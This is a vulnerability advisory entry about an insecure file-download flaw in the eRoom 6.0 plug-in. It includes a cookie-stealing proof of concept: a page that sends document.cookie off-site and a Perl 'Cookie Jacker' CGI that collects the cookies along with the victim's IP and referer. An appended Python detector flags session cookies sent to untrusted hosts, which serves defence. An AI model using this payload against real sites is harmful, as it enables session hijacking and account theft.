eRoom 6.0 Plug-In Insecure File Download Handling Vulnerability

ID SSV:79601
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


The eRoom plug-in is prone to an insecure file download handling vulnerability.

The issue stems from a design flaw: files shared by users are apparently passed to the default file handler when they are downloaded. This can happen without the user's knowledge, and it is a security risk for certain file types on certain platforms.

 /* cookie.html */
    <title>Raiding the cookie jar</title>

    <script>document.location='' +document.cookie</script>


  /* cookie.cgi */
  use CGI qw(:standard);
  use CGI::Carp qw(warningsToBrowser fatalsToBrowser);
  use strict;

  my $break = "<br>";
  my $browser = $ENV{'HTTP_USER_AGENT'};
  my $cookie = $ENV{'QUERY_STRING'};
  my $remote = $ENV{'REMOTE_ADDR'};
  my $referer = $ENV{'HTTP_REFERER'};
  my $reqmeth = $ENV{'REQUEST_METHOD'};

  print header;

  print "<html>",
        "<head><title>Cookie Jacker</title></head>",
        "ASPSESSIONID & SMSESSIONID could be useful for something? ;)",
        "<img src=\"/cookiemonster.jpg\">";

  # Turn the ';%20' separators between cookies into line breaks
  $cookie =~ s/;%20/$break/g;

  # Browser-dependent banner
  if ($browser =~ /MSIE/) {
      print "Come on, is this the 90s or smtng!$break";
  } else {
      print "j00 are l33t$break";
  }

  # Echo the request details taken from the CGI environment
  print "Client connection came from $remote$break",
        "Refered by $referer$break",
        "Using $reqmeth$break$break";

  print end_html;
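
A detection sketch for the pattern in the proof of concept above, added here as an example and not part of the original advisory: it scans proxy log lines for requests that carry session-cookie names in the query string to a host outside a trusted set. The log layout, host names and cookie values are constructed; the cookie names and the `;%20` separator come from the page.

```python
import re
from urllib.parse import urlsplit, unquote

# Cookie names taken from the page; ASP session cookies carry a suffix
# after "ASPSESSIONID", hence the \w*.
SESSION_COOKIE = re.compile(
    r"(?:^|[;&=]\s*)(ASPSESSIONID\w*|SMSESSIONID)=[^;&]+")

# Constructed sample. Assumed layout: client_ip method url referer
SAMPLE_LOG = """\
10.0.0.5 GET http://eroom.corp.example/files/list?ASPSESSIONIDQQGG=1 -
10.0.0.7 GET http://collector.invalid/cookie.cgi?ASPSESSIONIDQQGGQDAB=KLMNOPQR;%20SMSESSIONID=abc123 http://eroom.corp.example/
10.0.0.9 GET http://search.example/find?q=what+is+ASPSESSIONID -
"""


def find_cookie_leaks(log_text, trusted_hosts):
    """Return (client, dest_host, cookie_names) for every request that sends
    session-cookie name=value pairs in its query string to an untrusted host."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue  # not a request line in the assumed layout
        client, _method, url = parts[:3]
        target = urlsplit(url)
        host = (target.hostname or "").lower()
        if host in trusted_hosts:
            continue  # the application's own hosts may see these names
        # Decode %20 so "name=value; name=value" is matched as the browser
        # built it from document.cookie.
        query = unquote(target.query)
        names = sorted({m.group(1) for m in SESSION_COOKIE.finditer(query)})
        if names:
            hits.append((client, host, names))
    return hits


if __name__ == "__main__":
    for client, host, names in find_cookie_leaks(
            SAMPLE_LOG, {"eroom.corp.example"}):
        print(f"{client} sent {', '.join(names)} to {host}")
```

The third sample line only mentions a cookie name inside a search term and is not flagged, because the pattern requires a `name=value` pair at a cookie boundary.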